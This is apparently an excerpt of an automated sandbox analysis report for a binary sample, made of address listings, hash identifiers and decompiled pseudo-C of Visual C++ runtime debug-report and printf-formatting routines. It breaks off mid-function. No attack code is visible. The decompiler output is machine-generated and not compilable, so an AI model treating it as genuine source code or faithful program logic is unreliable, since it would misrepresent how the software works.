                            0x00421d33
                            0x00000000
                            0x00000000
                            0x00421d35
                            0x00421d3b
                            0x00421d3e
                            0x00421d3e
                            0x00421d46
                            0x00421d46
                            0x00421d4c
                            0x00421d4c
                            0x00421d4f
                            0x00000000
                            0x00421c92
                            0x00421c92
                            0x00421c92
                            0x00421c96
                            0x00421c98
                            0x00421c9d
                            0x00421c9d
                            0x00421ca0
                            0x00421ca7
                            0x00421caa
                            0x00421cb0
                            0x00421cb0
                            0x00421cb0
                            0x00421cbc
                            0x00421cbf
                            0x00421cc5
                            0x00421cc7
                            0x00000000
                            0x00000000
                            0x00421cc9
                            0x00421cc9
                            0x00421ccf
                            0x00421cd2
                            0x00421cd4
                            0x00000000
                            0x00000000
                            0x00421cd6
                            0x00421cdc
                            0x00421cdf
                            0x00421cdf
                            0x00421ce7
                            0x00421ced
                            0x00421cf0
                            0x00421cf2
                            0x00421d52
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00422302
                            0x00000000
                            0x0042200b
                            0x0042200b
                            0x00000000
                            0x00000000
                            0x00422027
                            0x00422027
                            0x00422031
                            0x00422031
                            0x0042203b
                            0x0042203b
                            0x00422041
                            0x00422043
                            0x0042204d
                            0x0042204d
                            0x00422050
                            0x00422053
                            0x00422053
                            0x0042207a
                            0x0042207d
                            0x0042207d
                            0x00422082
                            0x004220a4
                            0x004220a4
                            0x004220aa
                            0x004220cc
                            0x004220cc
                            0x004220cf
                            0x00422116
                            0x00422116
                            0x00422119
                            0x00422136
                            0x0042213a
                            0x00422142
                            0x00422142
                            0x00422144
                            0x0042214a
                            0x0042211b
                            0x0042211b
                            0x0042211f
                            0x00422127
                            0x00422128
                            0x0042212e
                            0x0042212e
                            0x004220d1
                            0x004220d4
                            0x004220d4
                            0x004220d7
                            0x004220f5
                            0x00422101
                            0x00422104
                            0x00422105
                            0x0042210b
                            0x004220d9
                            0x004220d9
                            0x004220dd
                            0x004220e5
                            0x004220e6
                            0x004220e7
                            0x004220ed
                            0x004220ed
                            0x00422111
                            0x004220ac
                            0x004220ac
                            0x004220b8
                            0x004220be
                            0x004220be
                            0x00422084
                            0x00422084
                            0x00422090
                            0x00422096
                            0x00422096
                            0x00422153
                            0x00422153
                            0x00422156
                            0x00422198
                            0x00422198
                            0x0042219e
                            0x004221a4
                            0x004221aa
                            0x00000000
                            0x00422158
                            0x00422158
                            0x00422158
                            0x0042215f
                            0x00000000
                            0x00000000
                            0x00422161
                            0x00422161
                            0x0042216c
                            0x00422172
                            0x00422174
                            0x0042217a
                            0x0042217d
                            0x0042217f
                            0x00422185
                            0x0042218e
                            0x00422193
                            0x004221b0
                            0x004221b3
                            0x004221b3
                            0x004221b8
                            0x004221bd
                            0x004221bd
                            0x004221c3
                            0x004221c5
                            0x004221cb
                            0x004221d1
                            0x004221d1
                            0x004221da
                            0x004221da
                            0x004221c3
                            0x004221e0
                            0x004221e4
                            0x004221f2
                            0x004221f5
                            0x004221f8
                            0x004221ff
                            0x00422201
                            0x00422201
                            0x004221e6
                            0x004221e6
                            0x004221e6
                            0x0042220e
                            0x0042220e
                            0x00422214
                            0x00422216
                            0x00422216
                            0x0042221d
                            0x00422220
                            0x00422223
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00422233
                            0x00422239
                            0x00422239
                            0x0042223f
                            0x00000000
                            0x00000000
                            0x00422241
                            0x00422241
                            0x00422244
                            0x00422247
                            0x0042224e
                            0x00422255
                            0x0042225d
                            0x00422263
                            0x00422266
                            0x00422269
                            0x00422270
                            0x0042227c
                            0x00422282
                            0x00422288
                            0x0042228f
                            0x00422291
                            0x00422297
                            0x00422297
                            0x0042229d
                            0x0042229d
                            0x004222a3
                            0x004222a6
                            0x004222ac
                            0x004222b1
                            0x004222b4
                            0x00422223
                            0x00422223
                            0x00422229
                            0x0042222c
                            0x0042222f
                            0x00422231
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422231
                            0x00422223
                            0x00422163
                            0x00422163
                            0x0042216a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0042216a
                            0x00000000
                            0x00422302
                            0x00422302
                            0x00422306
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00422306
                            0x00000000
                            0x00000000
                            0x004218c1
                            0x004218c4
                            0x004218c7
                            0x00000000
                            0x00000000
                            0x004218cc
                            0x004218cf
                            0x004218d4
                            0x00000000
                            0x00000000
                            0x004218b6
                            0x004218b6
                            0x004218b9
                            0x004218bc
                            0x00000000
                            0x00000000
                            0x004218ab
                            0x004218ae
                            0x004218b1
                            0x00000000
                            0x00000000
                            0x004218d9
                            0x004218d9
                            0x004218dc
                            0x004218dc
                            0x004218df
                            0x00000000
                            0x00000000
                            0x004218e2
                            0x00000000
                            0x00000000
                            0x0042167e
                            0x00421680
                            0x0042168e
                            0x00421682
                            0x00421682
                            0x00421682
                            0x00421698
                            0x0042169e
                            0x004216ab
                            0x004216ad
                            0x004216b2
                            0x004216b4
                            0x004216b9
                            0x004216be
                            0x004216c0
                            0x004216c5
                            0x004216cb
                            0x004216cd
                            0x004216cd
                            0x004216cb
                            0x004216ce
                            0x004216d5
                            0x00000000
                            0x004216d7
                            0x004216dc
                            0x004216f8
                            0x00421700
                            0x0042170d
                            0x00421712
                            0x00000000
                            0x00421712
                            0x004216d5
                            0x00421678
                            0x0042250d
                            0x00422514
                            0x0042252b
                            0x0042252b
                            0x00422535
                            0x00422535
                            0x0042253b
                            0x00422548
                            0x0042254a
                            0x0042254f
                            0x00422551
                            0x00422556
                            0x0042255b
                            0x0042255d
                            0x00422562
                            0x00422568
                            0x0042256a
                            0x0042256a
                            0x00422568
                            0x00422572
                            0x004225bd
                            0x004225c6
                            0x004225cb
                            0x00422574
                            0x00422579
                            0x00422595
                            0x0042259d
                            0x004225aa
                            0x004225af
                            0x004225af
                            0x00000000
                            0x00422572
                            0x00422516
                            0x0042251d
                            0x00000000
                            0x00000000
                            0x0042251f
                            0x0042251f
                            0x00000000
                            0x0042251f
                            0x00421dcf
                            0x00421dcf
                            0x00421dd4
                            0x00421df0
                            0x00421df8
                            0x00421e02
                            0x00421e05
                            0x00421e0a
                            0x004225d1
                            0x004225de
                            0x004225de
                            0x00421e1a
                            0x00421e20
                            0x00421e40
                            0x00421e22
                            0x00421e2f
                            0x00421e2f
                            0x00421e42
                            0x00000000
                            0x00421e42

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_get_int_arg_wctomb_s_write_string
                            • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                            • API String ID: 2357813345-2363074782
                            • Opcode ID: 4379c1649036bee3251d9156f27b723a57a31022ea91d637b3a0e5bb61386255
                            • Instruction ID: f04e039f0e8840ec5d1dba2a48301279b6c1ace4557b27e78eccaaa2793702d2
                            • Opcode Fuzzy Hash: 4379c1649036bee3251d9156f27b723a57a31022ea91d637b3a0e5bb61386255
                            • Instruction Fuzzy Hash: ABA1AF70E01228ABDF24DF54DD49BEEB7B0AB58304F9481DAE4097A291D7B85E80CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E00413277() {
                            				intOrPtr _t36;
                            				intOrPtr* _t37;
                            				void* _t40;
                            				void* _t48;
                            				void* _t62;
                            				void* _t63;
                            				signed int _t64;
                            				void* _t66;
                            				void* _t67;
                            
                            				 *(_t64 - 0x114c) = "...";
                            				if( *((intOrPtr*)(_t64 + 0x14)) == 0) {
                            					 *(_t64 - 0x1150) = 0x403d78;
                            				} else {
                            					 *(_t64 - 0x1150) = "\nModule: ";
                            				}
                            				_push( *((intOrPtr*)(_t64 - 0x1124)));
                            				_push( *((intOrPtr*)(_t64 - 0x1128)));
                            				_push( *((intOrPtr*)(_t64 - 0x112c)));
                            				_push( *((intOrPtr*)(_t64 - 0x1130)));
                            				_push( *((intOrPtr*)(_t64 - 0x1134)));
                            				_push( *((intOrPtr*)(_t64 - 0x1138)));
                            				_push( *((intOrPtr*)(_t64 - 0x113c)));
                            				_push( *((intOrPtr*)(_t64 - 0x1140)));
                            				_push( *((intOrPtr*)(_t64 - 0x1144)));
                            				_push( *(_t64 - 0x114c));
                            				_push( *(_t64 - 0x1150));
                            				_push( *((intOrPtr*)(_t64 - 8)));
                            				_t61 =  *(_t64 + 8);
                            				_t53 = _t64 - 0x1010;
                            				_t36 = E00416AA0(_t64 - 0x1010, _t64 - 0x1010, 0x1000, 0xfff, "Debug %s!\n\nProgram: %s%s%s%s%s%s%s%s%s%s%s%s\n\n(Press Retry to debug the application)",  *((intOrPtr*)(0x4048a8 +  *(_t64 + 8) * 4)));
                            				_t67 = _t66 + 0x44;
                            				 *((intOrPtr*)(_t64 - 0xc)) = _t36;
                            				if( *((intOrPtr*)(_t64 - 0xc)) < 0) {
                            					_t61 =  *(L0040EC70(_t53));
                            					E0040D870( *(L0040EC70(_t53)), 0x16, 0x22, L"(*_errno())", L"__crtMessageWindowA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrpt.c", 0x160, 0);
                            					_t67 = _t67 + 0x20;
                            				}
                            				_t37 = L0040EC70(_t53);
                            				_t54 =  *((intOrPtr*)(_t64 - 0x1120));
                            				 *_t37 =  *((intOrPtr*)(_t64 - 0x1120));
                            				if( *((intOrPtr*)(_t64 - 0xc)) < 0) {
                            					_t61 = _t64 - 0x1010;
                            					E0040DDE0(E0040D960(_t48, _t54, _t63, _t64 - 0x1010, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t44, L"strcpy_s(szOutMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"__crtMessageWindowA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrpt.c", 0x165, 0);
                            					_t67 = _t67 + 0x24;
                            				}
                            				 *((intOrPtr*)(_t64 - 0x111c)) = E0041A080(_t64 - 0x1010, "Microsoft Visual C++ Debug Library", 0x12012);
                            				if( *((intOrPtr*)(_t64 - 0x111c)) == 3) {
                            					E004183D0(0x16);
                            					E0040FB80(3);
                            				}
                            				if( *((intOrPtr*)(_t64 - 0x111c)) != 4) {
                            					_t40 = 0;
                            				} else {
                            					_t40 = 1;
                            				}
                            				return E00416CA0(_t40, _t48,  *(_t64 - 0x10) ^ _t64, _t61, _t62, _t63);
                            			}












                            0x00413277
                            0x00413291
                            0x0041329f
                            0x00413293
                            0x00413293
                            0x00413293
                            0x004132af
                            0x004132b6
                            0x004132bd
                            0x004132c4
                            0x004132cb
                            0x004132d2
                            0x004132d9
                            0x004132e0
                            0x004132e7
                            0x004132ee
                            0x004132f5
                            0x004132f9
                            0x004132fa
                            0x00413314
                            0x0041331b
                            0x00413320
                            0x00413323
                            0x0041332a
                            0x0041334b
                            0x0041334e
                            0x00413353
                            0x00413353
                            0x00413356
                            0x0041335b
                            0x00413361
                            0x00413367
                            0x00413389
                            0x00413399
                            0x0041339e
                            0x0041339e
                            0x004133ba
                            0x004133c7
                            0x004133cb
                            0x004133d5
                            0x004133d5
                            0x004133e1
                            0x004133ea
                            0x004133e3
                            0x004133e3
                            0x004133e3
                            0x004133f9

                            APIs
                            Strings
                            • (*_errno()), xrefs: 0041333D
                            • __crtMessageWindowA, xrefs: 00413338, 00413375
                            • strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 0041337A
                            • (F@, xrefs: 004132E8, 004132EE
                            • ..., xrefs: 00413277
                            • Module: , xrefs: 00413293
                            • _CrtDbgReport: String too long or IO Error, xrefs: 0041337F
                            • Microsoft Visual C++ Debug Library, xrefs: 004133A6
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c, xrefs: 00413333, 00413370
                            • Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application), xrefs: 00413305
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
                            • String ID: Module: $(*_errno())$(F@$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                            • API String ID: 1485069716-1383134714
                            • Opcode ID: 084fbd19bc64d9b4e91a7dfe196a2bb5c3f80f70233bfa58c57a5ed39142056d
                            • Instruction ID: bb5b7e96d912d55e4cae483aa32f5a6e984fe357a54508584bab1faaa77bc80f
                            • Opcode Fuzzy Hash: 084fbd19bc64d9b4e91a7dfe196a2bb5c3f80f70233bfa58c57a5ed39142056d
                            • Instruction Fuzzy Hash: 423195B5E40218BBDB24EE91CC46FDA73B4AB48745F0041AAF308762C1D6B85BD4CF59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 69%
                            			E004235FA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                            				signed int* _t482;
                            				signed int _t486;
                            				void* _t491;
                            				signed int _t493;
                            				void* _t501;
                            				void* _t519;
                            				signed int _t523;
                            				void* _t534;
                            				signed int _t576;
                            				void* _t598;
                            				void* _t599;
                            				signed int _t600;
                            				void* _t602;
                            				void* _t603;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t599 = __esi;
                            					_t598 = __edi;
                            					_t534 = __ebx;
                            					_t482 = E0041C290(_t600 + 0x14);
                            					_t603 = _t602 + 4;
                            					 *(_t600 - 0x484) = _t482;
                            					if(E00420F80() != 0) {
                            						goto L115;
                            					}
                            					L106:
                            					__ecx = 0;
                            					if(0 == 0) {
                            						 *(__ebp - 0x4f4) = 0;
                            					} else {
                            						 *(__ebp - 0x4f4) = 1;
                            					}
                            					__edx =  *(__ebp - 0x4f4);
                            					 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
                            					if( *(__ebp - 0x488) == 0) {
                            						_push(L"(\"\'n\' format specifier disabled\", 0)");
                            						_push(0);
                            						_push(0x695);
                            						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            						_push(2);
                            						__eax = L0040E1A0();
                            						__esp = __esp + 0x14;
                            						if(__eax == 1) {
                            							asm("int3");
                            						}
                            					}
                            					if( *(__ebp - 0x488) != 0) {
                            						L114:
                            						while(1) {
                            							L187:
                            							if( *(_t600 - 0x28) != 0) {
                            								goto L212;
                            							}
                            							L188:
                            							if(( *(_t600 - 0x10) & 0x00000040) != 0) {
                            								if(( *(_t600 - 0x10) & 0x00000100) == 0) {
                            									if(( *(_t600 - 0x10) & 0x00000001) == 0) {
                            										if(( *(_t600 - 0x10) & 0x00000002) != 0) {
                            											 *((short*)(_t600 - 0x14)) = 0x20;
                            											 *(_t600 - 0x1c) = 1;
                            										}
                            									} else {
                            										 *((short*)(_t600 - 0x14)) = 0x2b;
                            										 *(_t600 - 0x1c) = 1;
                            									}
                            								} else {
                            									 *((short*)(_t600 - 0x14)) = 0x2d;
                            									 *(_t600 - 0x1c) = 1;
                            								}
                            							}
                            							 *((intOrPtr*)(_t600 - 0x4ac)) =  *((intOrPtr*)(_t600 - 0x18)) -  *(_t600 - 0x24) -  *(_t600 - 0x1c);
                            							if(( *(_t600 - 0x10) & 0x0000000c) == 0) {
                            								E00423FF0(0x20,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
                            								_t603 = _t603 + 0x10;
                            							}
                            							E00424030( *(_t600 - 0x1c), _t600 - 0x14,  *(_t600 - 0x1c),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
                            							_t603 = _t603 + 0x10;
                            							if(( *(_t600 - 0x10) & 0x00000008) != 0) {
                            								if(( *(_t600 - 0x10) & 0x00000004) == 0) {
                            									E00423FF0(0x30,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
                            									_t603 = _t603 + 0x10;
                            								}
                            							}
                            							if( *(_t600 - 0xc) != 0) {
                            								L208:
                            								E00424030( *(_t600 - 0x24),  *((intOrPtr*)(_t600 - 4)),  *(_t600 - 0x24),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
                            								_t603 = _t603 + 0x10;
                            								goto L209;
                            							} else {
                            								L201:
                            								if( *(_t600 - 0x24) <= 0) {
                            									goto L208;
                            								}
                            								L202:
                            								 *((intOrPtr*)(_t600 - 0x4b0)) =  *((intOrPtr*)(_t600 - 4));
                            								 *(_t600 - 0x4b4) =  *(_t600 - 0x24);
                            								while(1) {
                            									L203:
                            									 *(_t600 - 0x4b4) =  *(_t600 - 0x4b4) - 1;
                            									if( *(_t600 - 0x4b4) <= 0) {
                            										break;
                            									}
                            									L204:
                            									_t519 = E0040D3B0(_t600 - 0x40);
                            									_t523 = E00419150(_t600 - 0x458,  *((intOrPtr*)(_t600 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t600 - 0x40))) + 0xac)), _t519);
                            									_t603 = _t603 + 0x10;
                            									 *(_t600 - 0x4b8) = _t523;
                            									if( *(_t600 - 0x4b8) > 0) {
                            										L206:
                            										E00423F90( *(_t600 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
                            										_t603 = _t603 + 0xc;
                            										 *((intOrPtr*)(_t600 - 0x4b0)) =  *((intOrPtr*)(_t600 - 0x4b0)) +  *(_t600 - 0x4b8);
                            										continue;
                            									}
                            									L205:
                            									 *(_t600 - 0x44c) = 0xffffffff;
                            									break;
                            								}
                            								L207:
                            								L209:
                            								if( *(_t600 - 0x44c) >= 0) {
                            									if(( *(_t600 - 0x10) & 0x00000004) != 0) {
                            										E00423FF0(0x20,  *((intOrPtr*)(_t600 - 0x4ac)),  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
                            										_t603 = _t603 + 0x10;
                            									}
                            								}
                            							}
                            							L212:
                            							if( *(_t600 - 0x20) != 0) {
                            								L0040C240( *(_t600 - 0x20), 2);
                            								_t603 = _t603 + 8;
                            								 *(_t600 - 0x20) = 0;
                            							}
                            							while(1) {
                            								L214:
                            								 *(_t600 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t600 + 0xc))));
                            								_t538 =  *(_t600 - 0x454) & 0x0000ffff;
                            								 *((intOrPtr*)(_t600 + 0xc)) =  *((intOrPtr*)(_t600 + 0xc)) + 2;
                            								if(( *(_t600 - 0x454) & 0x0000ffff) == 0 ||  *(_t600 - 0x44c) < 0) {
                            									break;
                            								} else {
                            									if(( *(_t600 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t600 - 0x454) & 0x0000ffff) > 0x78) {
                            										 *(_t600 - 0x4d8) = 0;
                            									} else {
                            										 *(_t600 - 0x4d8) =  *(( *(_t600 - 0x454) & 0x0000ffff) + L"pecifier\", 0)") & 0xf;
                            									}
                            								}
                            								L7:
                            								 *(_t600 - 0x450) =  *(_t600 - 0x4d8);
                            								_t576 =  *(_t600 - 0x450) * 9;
                            								_t493 =  *(_t600 - 0x45c);
                            								_t546 = ( *(_t576 + _t493 + 0x4083d0) & 0x000000ff) >> 4;
                            								 *(_t600 - 0x45c) = ( *(_t576 + _t493 + 0x4083d0) & 0x000000ff) >> 4;
                            								if( *(_t600 - 0x45c) != 8) {
                            									L16:
                            									 *(_t600 - 0x4e0) =  *(_t600 - 0x45c);
                            									if( *(_t600 - 0x4e0) > 7) {
                            										continue;
                            									}
                            									L17:
                            									switch( *((intOrPtr*)( *(_t600 - 0x4e0) * 4 +  &M00423E84))) {
                            										case 0:
                            											L18:
                            											 *(_t600 - 0xc) = 1;
                            											E00423F90( *(_t600 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t600 + 8)), _t600 - 0x44c);
                            											_t603 = _t603 + 0xc;
                            											goto L214;
                            										case 1:
                            											L19:
                            											 *(__ebp - 0x2c) = 0;
                            											__ecx =  *(__ebp - 0x2c);
                            											 *(__ebp - 0x28) = __ecx;
                            											__edx =  *(__ebp - 0x28);
                            											 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            											__eax =  *(__ebp - 0x18);
                            											 *(__ebp - 0x1c) =  *(__ebp - 0x18);
                            											 *(__ebp - 0x10) = 0;
                            											 *(__ebp - 0x30) = 0xffffffff;
                            											 *(__ebp - 0xc) = 0;
                            											goto L214;
                            										case 2:
                            											L20:
                            											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            											 *(__ebp - 0x4e4) = __ecx;
                            											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            											 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
                            											__eflags =  *(__ebp - 0x4e4) - 0x10;
                            											if( *(__ebp - 0x4e4) > 0x10) {
                            												goto L27;
                            											}
                            											L21:
                            											_t58 =  *(__ebp - 0x4e4) + 0x423ebc; // 0x498d04
                            											__ecx =  *_t58 & 0x000000ff;
                            											switch( *((intOrPtr*)(__ecx * 4 +  &M00423EA4))) {
                            												case 0:
                            													goto L24;
                            												case 1:
                            													goto L25;
                            												case 2:
                            													goto L23;
                            												case 3:
                            													goto L22;
                            												case 4:
                            													goto L26;
                            												case 5:
                            													goto L27;
                            											}
                            										case 3:
                            											L28:
                            											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            												__edx =  *(__ebp - 0x18);
                            												__edx =  *(__ebp - 0x18) * 0xa;
                            												__eflags = __edx;
                            												_t82 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            												__ecx = __edx + _t82;
                            												 *(__ebp - 0x18) = __ecx;
                            											} else {
                            												__edx = __ebp + 0x14;
                            												 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x18);
                            												if( *(__ebp - 0x18) < 0) {
                            													__eax =  *(__ebp - 0x10);
                            													__eax =  *(__ebp - 0x10) | 0x00000004;
                            													__eflags = __eax;
                            													 *(__ebp - 0x10) = __eax;
                            													__ecx =  *(__ebp - 0x18);
                            													__ecx =  ~( *(__ebp - 0x18));
                            													 *(__ebp - 0x18) = __ecx;
                            												}
                            											}
                            											L33:
                            											goto L214;
                            										case 4:
                            											L34:
                            											 *(__ebp - 0x30) = 0;
                            											goto L214;
                            										case 5:
                            											L35:
                            											__edx =  *(__ebp - 0x454) & 0x0000ffff;
                            											__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
                            											if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
                            												__ecx =  *(__ebp - 0x30);
                            												__ecx =  *(__ebp - 0x30) * 0xa;
                            												__eflags = __ecx;
                            												_t93 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
                            												__eax = __ecx + _t93;
                            												 *(__ebp - 0x30) = __ecx + _t93;
                            											} else {
                            												__eax = __ebp + 0x14;
                            												 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            												__eflags =  *(__ebp - 0x30);
                            												if( *(__ebp - 0x30) < 0) {
                            													 *(__ebp - 0x30) = 0xffffffff;
                            												}
                            											}
                            											goto L214;
                            										case 6:
                            											L41:
                            											__ecx =  *(__ebp - 0x454) & 0x0000ffff;
                            											 *(__ebp - 0x4e8) = __ecx;
                            											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            											 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
                            											__eflags =  *(__ebp - 0x4e8) - 0x2e;
                            											if( *(__ebp - 0x4e8) > 0x2e) {
                            												L64:
                            												goto L214;
                            											}
                            											L42:
                            											_t101 =  *(__ebp - 0x4e8) + 0x423ee4; // 0x36f19003
                            											__ecx =  *_t101 & 0x000000ff;
                            											switch( *((intOrPtr*)(__ecx * 4 +  &M00423ED0))) {
                            												case 0:
                            													L47:
                            													__ecx =  *(__ebp + 0xc);
                            													__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
                            													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
                            														L50:
                            														__ecx =  *(__ebp + 0xc);
                            														__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            														__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
                            														if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
                            															L53:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx & 0x0000ffff;
                            															__eflags = ( *__ecx & 0x0000ffff) - 0x64;
                            															if(( *__ecx & 0x0000ffff) == 0x64) {
                            																L59:
                            																L61:
                            																goto L64;
                            															}
                            															L54:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = __ecx - 0x69;
                            															if(__ecx == 0x69) {
                            																goto L59;
                            															}
                            															L55:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
                            															if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
                            																goto L59;
                            															}
                            															L56:
                            															__ecx =  *(__ebp + 0xc);
                            															__edx =  *__ecx & 0x0000ffff;
                            															__eflags = ( *__ecx & 0x0000ffff) - 0x75;
                            															if(( *__ecx & 0x0000ffff) == 0x75) {
                            																goto L59;
                            															}
                            															L57:
                            															__eax =  *(__ebp + 0xc);
                            															__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = __ecx - 0x78;
                            															if(__ecx == 0x78) {
                            																goto L59;
                            															}
                            															L58:
                            															__edx =  *(__ebp + 0xc);
                            															__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            															__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
                            															if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
                            																 *(__ebp - 0x45c) = 0;
                            																goto L18;
                            															}
                            															goto L59;
                            														}
                            														L51:
                            														__eax =  *(__ebp + 0xc);
                            														__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            														__eflags = __ecx - 0x32;
                            														if(__ecx != 0x32) {
                            															goto L53;
                            														} else {
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            															goto L61;
                            														}
                            													}
                            													L48:
                            													__eax =  *(__ebp + 0xc);
                            													__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            													__eflags = __ecx - 0x34;
                            													if(__ecx != 0x34) {
                            														goto L50;
                            													} else {
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            														goto L61;
                            													}
                            												case 1:
                            													L62:
                            													__ecx =  *(__ebp - 0x10);
                            													__ecx =  *(__ebp - 0x10) | 0x00000020;
                            													 *(__ebp - 0x10) = __ecx;
                            													goto L64;
                            												case 2:
                            													L43:
                            													__edx =  *(__ebp + 0xc);
                            													__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            													__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
                            													if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
                            														__eax =  *(__ebp - 0x10);
                            														__eax =  *(__ebp - 0x10) | 0x00000010;
